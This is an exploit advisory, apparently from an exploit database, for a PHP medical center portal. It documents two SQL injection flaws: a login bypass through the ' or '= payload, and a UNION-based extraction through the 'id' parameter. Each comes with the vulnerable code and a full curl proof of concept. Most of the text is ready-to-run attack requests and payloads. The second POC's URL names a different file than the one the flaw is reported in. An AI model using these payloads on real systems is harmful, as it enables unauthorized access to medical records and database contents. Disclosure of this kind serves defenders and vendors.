# Exploit Title: Medical Center Portal Management System  - SQL Injection(s)
# Date: 2020-11-16
# Exploit Author: gh1mau 
# Email: gh1mau.rulez@gmail.com
# Team Members: Capt'N, muzzo, chaos689 | https://h0fclanmalaysia.wordpress.com/
# Vendor Homepage: https://www.sourcecodester.com/php/14594/medical-center-portal-management-system.html
# Software Link: https://www.sourcecodester.com/download-code?nid=14594&title=Medical+Center+Portal+Management+System+using+PHP%2FMySQLi
# Software Release Data: November 16, 2020
# Tested on: PHP 5.6.18, Apache/2.4.18 (Win32), Ver 14.14 Distrib 5.7.11, for Win32 (AMD64)


1. Authentication Bypass

Vulnerable File:
---------------- 
/pages/processlogin.php

Vulnerable Code:
-----------------
Entry point: (User input is not filtered)
  line 8: $users = trim($_POST['user']);
  line 9: $upass = trim($_POST['password']);

Exit point:
  line 28: $result = $db->query($sql);

Vulnerable Issue:
-----------------
Attacker could bypass the authentication using simple sqli login bypass payload

  username: gh1mau' or '=
  password: gh1mau' or '=


POC:
----
curl -i -s -k --location --request POST 'http://localhost:88/medic/pages/processlogin.php' \
--header 'Origin: http://localhost' \
--header 'Cookie: PHPSESSID=3ijdjbcvocp1qmoi0kbfomhbr5' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' \
--header 'Referer: http://localhost:88/medic/pages/login.php' \
--header 'Connection: close' \
--header 'Sec-Fetch-Site: same-origin' \
--header 'Sec-Fetch-Dest: document' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Sec-Fetch-Mode: navigate' \
--header 'Cache-Control: max-age=0' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Sec-Fetch-User: ?1' \
--header 'Accept-Language: en-US,en;q=0.9' \
--header 'Content-Length: 63' \
--header 'Content-Type: application/x-www-form-urlencoded' \
--data-raw 'user=gh1mau%27+or+%27%3D&password=gh1mau%27+or+%27%3D&btnlogin='


2. SQL Injection in 'id' parameter

Vulnerable File:
---------------- 
/pages/cust_searchfrm.php

Vulnerable Code:
-----------------
Entry point: (User input is not filtered)
  line 25: $query = 'SELECT * FROM customer1 WHERE EMPLOYEE_ID ='.$_GET['id'];
  
Exit point:
  line 26: $result = mysqli_query($db, $query) or die(mysqli_error($db));

Vulnerable Issue:
-----------------
Authenticated Attacker could inject SQLi payloads through the 'id' parameter. Other files are als affected with the same issue

Payload:
--------
UNION+ALL+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--+-

POC:
----
curl -i -s -k --location --request GET 'http://localhost/medic/pages/us_searchfrm.php?action=edit%20&%20id=1+UNION+ALL+SELECT+1,CONCAT_WS(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13--+-' \
--header 'Cookie: PHPSESSID=3ijdjbcvocp1qmoi0kbfomhbr5' \
--header 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9' \
--header 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36' \
--header 'Connection: close' \
--header 'Sec-Fetch-Site: none' \
--header 'Sec-Fetch-Dest: document' \
--header 'Host: localhost:88' \
--header 'Accept-Encoding: gzip, deflate' \
--header 'Sec-Fetch-Mode: navigate' \
--header 'Cache-Control: max-age=0' \
--header 'Upgrade-Insecure-Requests: 1' \
--header 'Sec-Fetch-User: ?1' \
--header 'Accept-Language: en-US,en;q=0.9' \
--data-raw ''